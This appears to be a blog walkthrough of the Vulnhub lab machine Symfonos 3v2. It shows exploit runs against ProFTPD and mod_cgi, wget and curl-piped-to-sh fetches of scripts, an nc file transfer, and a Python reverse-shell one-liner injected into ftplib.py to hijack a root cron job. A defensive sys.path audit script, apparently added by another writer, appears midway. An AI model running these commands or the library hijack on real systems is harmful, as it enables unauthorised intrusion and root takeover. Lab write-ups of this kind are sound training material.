Magda is Hacking Series: Symfonos Write-Up

Dr Magda CHELLY, CISSP, PhD
Published in Magda On Cyber
9 min read · Feb 12, 2021


In this article, I am sharing with you a different perspective on how to hack Symfonos: 3v2, deliberately minimizing the use of automated tools.

The machine is hosted on the Vulnhub website. Credit for this machine goes to Zayotic.

The article will include:

§ Setup Details

§ Penetration Testing Methodology

§ Useful Tools and Commands

§ Concept Definitions

§ Exploitation Details

I. Setup Details

The machine is easy to install from the .ova file with VMware.

II. Penetration Testing Methodology, Useful Tools and Commands

Finding the IP address is the first step of our journey and of the enumeration. The target machine's IP address is 192.168.111.139.

Let's discover what is currently running, and what we can find with some enumeration. I use AutoRecon and nmap.

Nmap quickly gives me a result: the FTP port is open, running ProFTPD:

All versions of ProFTPD up to and including 1.3.5b are affected by a remote code execution vulnerability: an arbitrary file copy flaw in the mod_copy module, which is part of the default ProFTPD installation and enabled by default.

I didn't wait for the AutoRecon results; I am slightly impatient today.

Google found some good stuff on this FTP version:

Let’s give it a try.

python3 exploit_mags.py --host 192.168.111.139 --port 21 --path "/var/www/html/"

I need to find more information, as the exploit needs login credentials, and I am unsure about the path, but …

Let's check further; there is a nice picture on port 80:

And then, after running dirb, another one:

http://192.168.111.139/gate/

DirBuster is a multi-threaded Java application designed to brute-force directory and file names on web/application servers. I most commonly use dirb, but DirBuster is fast and multi-threaded, which is important if time is critical.

I will just run DirBuster again; I feel there is a hint with the gate 😊 :

Well, I was right…

The underworld folder seems full of treasures …

I check it out, and this is what I see:

Let’s get a Google search now:

As usual, we see several results, so let’s try on Exploit-db:

The exploit is written in Python and targets a vulnerability described as a mod_cgi remote exploit:

./exploit_magggs.py payload=reverse rhost=192.168.111.139 lhost=192.168.111.131 lport=1234

And it does not run ….

I forgot to add the right page, which is underworld:

python exploit_magggs.py payload=reverse rhost=192.168.111.139 lhost=192.168.111.131 lport=1234 pages=http://192.168.111.139/cgi-bin/underworld/

I ran the command again, and the result is below: we have a user shell. YaaY

Let's run a privilege escalation Python script now.

We simply fetch it with wget https://www.securitysift.com/download/linuxprivchecker.py and, of course, upload it to the tmp folder, as we can write there with no issues:

It is a PHP 7.0 version:

Well, I tried a few things, including sudo su, and they didn't work. Neither did the passwords found in config files, nor the SMTP one.

I don't always use tcpdump, but I read about it somewhere recently, so I will give it a try:

pcap files are data files created by the program and contain the captured packet data of a network. They are mainly used to analyze the characteristics of that traffic. tcpdump was giving me some issues running in the foreground, so I added & to run it in the background.

After creating file.pcap, I needed to send it to my machine and open it with Wireshark.

On the sending machine:

nc -w 3 192.168.111.131 4445 < file.pcap

On my machine:

nc -l -p 4445 > file.pcap

First attempt, nothing, so I checked the file size and looked at it.

Second attempt was successful:

I have found the password for hades — PTpZTfU4vxgzvRBE

Amazing screenshot below, right? :D Don't judge me on my late-night hacking please :D !

Well, at least I typed it right in the end .. Haha …

python -c 'import pty; pty.spawn("/bin/sh")'

hades — PTpZTfU4vxgzvRBE

Again, privilege escalation, and I found ONLY writable files, no executables. We need to find a writable file that we can change to get a reverse shell…

find / -writable -type d 2>/dev/null # folders writable by the current user

The result: writable, yes, but not executable, so I think of cron jobs, right?

Let's see what cron jobs are scheduled; perhaps they are executed as root.

§ 17 * * * * root cd / && run-parts --report /etc/cron.hourly

§ 25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )

§ 47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )

§ 52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )

This basically tells us that, in our case, run-parts runs all the scripts in the folder /etc/cron.hourly as root.

But we can't write in the cron.hourly folder either …. After some research, I needed to find another way in, and I found this tool: pspy, unprivileged Linux process snooping. I had not used this one before, and it took me some time to find the way forward.

pspy is a command line tool designed to snoop on processes without the need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute. Great for enumeration of Linux systems. You can find it here: https://github.com/DominicBreuker/pspy

I run the below command:

./pspy32 -pf -i 1000

We see the below:

2020/07/15 12:02:01 CMD: UID=0    PID=19660  | /bin/sh -c /usr/bin/python2.7 /opt/ftpclient/ftpclient.py

This entry appears after cron -f. There is code in the kernel that explicitly checks for uid 0 whenever it needs to identify the root user, which means that UID=0 here is root. We also see that the cron job runs every minute, as below:

Here I got stuck …

I couldn't write into the file as hades… And I stumbled…

After my call for help on Twitter, I had an amazing TIP from my new WONDERFUL mentor… I wanted to root this machine by myself, so I did not want spoilers 😊

I started by running linpeas.sh again, with:

curl https://raw.githubusercontent.com/carlospolop/privilege-escalation-awesome-scripts-suite/master/linPEAS/linpeas.sh | sh

The only way forward seemed to be ftpclient.py. cat ftpclient.py and we see the below:

The only way to make a change is through the ftplib library, as we have seen that hades can write to the python2.7 folder.

Let’s go:

cd /usr/lib/python2.7

Let's add a reverse shell to ftplib.py. Well, by doing so I actually overwrote the file and needed to reboot the machine, as it failed. So remember to always copy the file before making changes…

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.111.131", 4445));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

When ftplib.py is loaded, the Python interpreter first checks whether an ftplib.pyc (the byte-code compiled version of ftplib.py) exists and is more recent than ftplib.py. If so, the interpreter runs the .pyc. If it does not exist, or ftplib.py is more recent, the interpreter first compiles ftplib.py to ftplib.pyc.

There is one exception to the above: if you put '#!/usr/bin/env python' on the first line of ftplib.py, make it executable and run ftplib.py by itself, the script is executed directly and no .pyc is written for it. But I went the other way and identified which function ftpclient.py executes first, and that was the function login.
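The lesson of the two paragraphs above is that a root cron job importing ftplib loads whatever sits in a search-path directory an unprivileged user can write. As an added example (my code, not from the write-up, standard library only), here is a small audit script that flags every sys.path directory or module file that a non-root user could modify, which is exactly the condition that let hades replace /usr/lib/python2.7/ftplib.py:

```python
import os
import stat
import sys


def writable_by_non_root(mode, uid, gid):
    """Pure check on stat fields: can someone other than root modify this?

    True when the entry is owned by a non-root user (the owner can chmod and
    rewrite it), is world-writable, or is writable by a non-root group.
    """
    if uid != 0:
        return True
    if mode & stat.S_IWOTH:
        return True
    if gid != 0 and mode & stat.S_IWGRP:
        return True
    return False


def audit_paths(paths):
    """Return sorted (path, reason) pairs for hijackable search-path entries."""
    findings = []
    for entry in paths:
        if not entry or not os.path.isdir(entry):
            continue  # '' means the CWD; zip/egg entries are out of scope
        st = os.lstat(entry)
        if writable_by_non_root(st.st_mode, st.st_uid, st.st_gid):
            # A writable directory is enough on its own: a new module or a
            # stale .pyc can be dropped in, so its files are not listed.
            findings.append((entry, "directory writable by non-root"))
            continue
        for name in os.listdir(entry):
            if not name.endswith((".py", ".pyc", ".so")):
                continue
            full = os.path.join(entry, name)
            try:
                fst = os.lstat(full)
            except OSError:
                continue
            if writable_by_non_root(fst.st_mode, fst.st_uid, fst.st_gid):
                findings.append((full, "module writable by non-root"))
    return sorted(findings)


if __name__ == "__main__":
    # Run with the same interpreter the privileged job uses (here python2.7).
    for path, reason in audit_paths(sys.path):
        print(reason + ": " + path)
```

Run it as the interpreter the cron job invokes, so sys.path matches what the root process will actually import from.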

That's it!

Downloaded locally the file with:

scp hades@192.168.111.140:/usr/lib/python2.7/ftplib.py .

Then, I made some changes as per below, including my reverse shell:

Then, uploaded back to the machine via:

scp ./ftplib.py hades@192.168.111.140:/usr/lib/python2.7/ftplib.py

Well, the first time I made a syntax mistake, so I needed to correct it as below:

Then it worked, and with nc -lvp 4445 in the other terminal I was listening 😊 …

And rooted … Woop, woop

This was an excellent machine, really liked it.

Disclaimer

My blogs are for informational and educational purposes only. The articles, blogs, videos, examples and all information is only for those who are interested to learn about Ethical Hacking, Security, and Penetration Testing. Please regard the word hacking as ethical hacking or penetration testing every time this word is used. I do not promote, encourage, support or excite any illegal activity or hacking without written permission in general.

Who am I ?

I am a keynote speaker, a serial entrepreneur and a senior cyber security expert. I am currently leading the cyber business for an international Fortune 500 insurance-broking firm in Asia.

I am a strong activist for women in security, and I founded the Women of Security Singapore Chapter (WoSEC), supporting female professionals in the industry.

I am a member of the Advisory Board for the Executive Summit at Black Hat Asia, and I am the co-founder of Responsible Cyber Pte. Ltd., a Singapore-based start-up with NUS Enterprise, the entrepreneurial arm of the National University of Singapore, and Singtel Innov8, the venture capital arm of the Singtel Group, as its shareholders. The company has been valued at 7 Million SGD in May 2020.

I have a PhD in Telecommunication Engineering from Telecom SudParis and speak five languages fluently.

My research topics have been focusing on Cyber Security, the future of localisation and positioning, education and more. My writings around cybersecurity have been featured by IEEE, RSA Conference, CYBERSEC, World Congress on Internet Security (WorldCIS-2016), CYBER RISK LEADERS Magazine, among others.

I speak about cybersecurity in general with a focus on cyber risk management, hacking and diversity and inclusion in the field.

I welcome you to watch some of my insights on Channel News Asia for a Documentary on the Dark Web (at 18:09mn approx): https://www.channelnewsasia.com/news/video-on-demand/the-dark-web


Cyberfeminist | Entrepreneur | Former CISO | PhD, CISSP, S-CISO | CoFounder Responsible Cyber | @womenoncyber | Documentary The Dark Web on @myCanal